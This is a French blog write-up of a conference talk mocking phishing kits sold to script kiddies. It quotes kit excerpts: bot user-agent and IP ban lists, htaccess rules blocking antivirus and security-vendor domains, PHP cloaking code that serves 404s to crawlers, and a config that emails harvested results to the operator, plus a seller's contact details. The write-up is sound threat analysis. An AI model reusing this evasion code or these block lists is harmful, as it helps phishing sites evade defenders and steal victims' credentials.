phishing kits k for kiddies

User Rating: 5 / 5

Details: Created: Monday, 03 June 2019 18:20; Written by Glacius

Phishing kits k for kiddies

Writeup transcript d'une conf de la https://www.rump.beer/2019/

De nos jours on trouve de tout sur le darwkeb. Certaines trouvailles sont lolesques et nous font vraiment rire. Par exemple, des campagnes de phishing "clefs en main" pour les script kiddies. Ces campagnes sont vendues, et en fait sont de vieux scripts qui datent des années 90! Cela fait du bien de rigoler un peu des fois:

Phishing kit? Hameçonnage? Hameçonnage en kit? Trousse d'hameçonnage?

J’ai cherché une définition de l’ANSSI mais j’ai pas trouvé. Big concept, Du coup je vais utiliser mes mots.

Phishing Kits 6 ✘ Un .zip avec tout ce qu’il faut dedans ✘ Suffit de modifier une variable, et pouf ta campagne run.

3 glacius phishing kit k for kiddies

Shadow Z118 Scam Paypal qui était quand même stylé

extrait:

'TweetedTimes Bot',
'QuerySeekerSpider',
'ShowyouBot',
'woriobot',
'merlinkbot',
'BazQuxBot',
'Kraken',
'SISTRIX Crawler',
'R6_CommentReader',
'magpie-crawler',
'GrapeshotCrawler',
'PercolateCrawler',
'MaxPointCrawler',
'R6_FeedFetcher',
'NetSeer crawler',
'grokkit-crawler',
'SMXCrawler',
'PulseCrawler',
'Y!J-BRW',
'80legs.com/webcrawler',

4 glacius htaccess phishing kit k for kiddies

Règles Deny spécifiques à des IPs + domaines

$bannedIP = array("^81.161.59.*", "^66.135.200.*", "^66.102.*.*", "^38.100.*.*", "^107.170.*.*", "^149.20.*.*", "^38.105.*.*", "^74.125.*.*",  "^66.150.14.*", "^54.176.*.*", "^38.100.*.*", "^184.173.*.*", "^66.249.*.*", "^128.242.*.*", "^72.14.192.*", "^208.65.144.*", "^74.125.*.*", "^209.85.128.*", "^216.239.32.*", "^74.125.*.*", "^207.126.144.*", "^173.194.*.*", "^64.233.160.*", "^72.14.192.*", "^66.102.*.*", "^64.18.*.*", "^194.52.68.*", "^194.72.238.*", "^62.116.207.*", "^212.50.193.*", "^69.65.*.*", "^50.7.*.*", "^131.212.*.*", "^46.116.*.* ", "^62.90.*.*", "^89.138.*.*", "^82.166.*.*", "^85.64.*.*", "^85.250.*.*", "^89.138.*.*", "^93.172.*.*", "^109.186.*.*", "^194.90.*.*", "^212.29.192.*", "^212.29.224.*", "^212.143.*.*", "^212.150.*.*", "^212.235.*.*", "^217.132.*.*", "^50.97.*.*", "^217.132.*.*", "^209.85.*.*", "^66.205.64.*", "^204.14.48.*", "^64.27.2.*", "^67.15.*.*", "^202.108.252.*", "^193.47.80.*", "^64.62.136.*", "^66.221.*.*", "^64.62.175.*", "^198.54.*.*", "^192.115.134.*", "^216.252.167.*", "^193.253.199.*", "^69.61.12.*", "^64.37.103.*", "^38.144.36.*", "^64.124.14.*", "^206.28.72.*", "^209.73.228.*", "^158.108.*.*", "^168.188.*.*", "^66.207.120.*", "^167.24.*.*", "^192.118.48.*", "^67.209.128.*", "^12.148.209.*", "^12.148.196.*", "^193.220.178.*", "68.65.53.71", "^198.25.*.*", "^64.106.213.*", "^91.103.66.*", "^208.91.115.*", "^199.30.228.*");

Règles Deny sur l’ensemble des AVs connus

deny from paypal.com deny from 112.2o7.com deny from firefox.com deny from apple.com deny from zeustracker.abuse.ch deny from virustotal.com deny from adminus.net deny from aegislab.com deny from alienvault.com deny from antiy.net deny from avast.com deny from team-cymru.org deny from eset.com deny from fireeye.com deny from microsoft.com deny from kernelmode.info deny from malwaredomainlist.com

Evasion: block by user agent

if(in_array($_SERVER['REMOTE_ADDR'],$bannedIP)) { header('HTTP/1.0 404 Not Found'); exit(); } if(strpos($_SERVER['HTTP_USER_AGENT'], 'google') or strpos($_SERVER['HTTP_USER_AGENT'], 'msnbot') or strpos($_SERVER['HTTP_USER_AGENT'], 'Yahoo! Slurp') or strpos($_SERVER['HTTP_USER_AGENT'], 'YahooSeeker') or strpos($_SERVER['HTTP_USER_AGENT'], 'Googlebot') or strpos($_SERVER['HTTP_USER_AGENT'], 'bingbot') or strpos($_SERVER['HTTP_USER_AGENT'], 'crawler') or strpos($_SERVER['HTTP_USER_AGENT'], 'PycURL') or strpos($_SERVER['HTTP_USER_AGENT'], 'facebookexternalhit') !== false) { header('HTTP/1.0 404 Not Found'); exit; }

Fun Facts Parce que bon faut bien rigoler un peu

Le tuto pour les nuls

/*
****** Set your email below and configure functions to your requirments ****
****** FUNCTION CONTROL: 1=ON and 0=OFF ****
EXAMPLE
$Example=1; // Function On
$Example=0; // Function Off
*/
$Your_Email = "This email address is being protected from spambots. You need JavaScript enabled to view it.";; // Set your email
$Send_Log=1; // Email results
$Save_Log=0; // Saves results to server (./assets/logs/)
$Abuse_Filter=0; // Block absuive text
$One_Time_Access=0; // One Time Access: This blocks the users ip after the form has been submitted i.e. prevents users sending multiple fake forms
$Encrypt=0; // Encrypt: This will send/save your results with aes to decrypt use the key below
$Key = "582ACCD12E3D1337"; // This key is used to decrypt results and can be changed
$Send_Per_Page=1; // Send each pages data seperate

Le mec fier de son travail qui signe avec sa page facebook

1-Change email in Docu/os.php
                  Docu/mobile.php
                  Docu/

2- Upload to a good Cpanel or Shell.
3- I sell all Spamming & Hacking tools. To get more tools, add me on
skype blackshop tools
ICQ 657940639
This email address is being protected from spambots. You need JavaScript enabled to view it.

Voilà, j'espère que ça vous a plu. Vos commentaires/remarques sont les bienvenus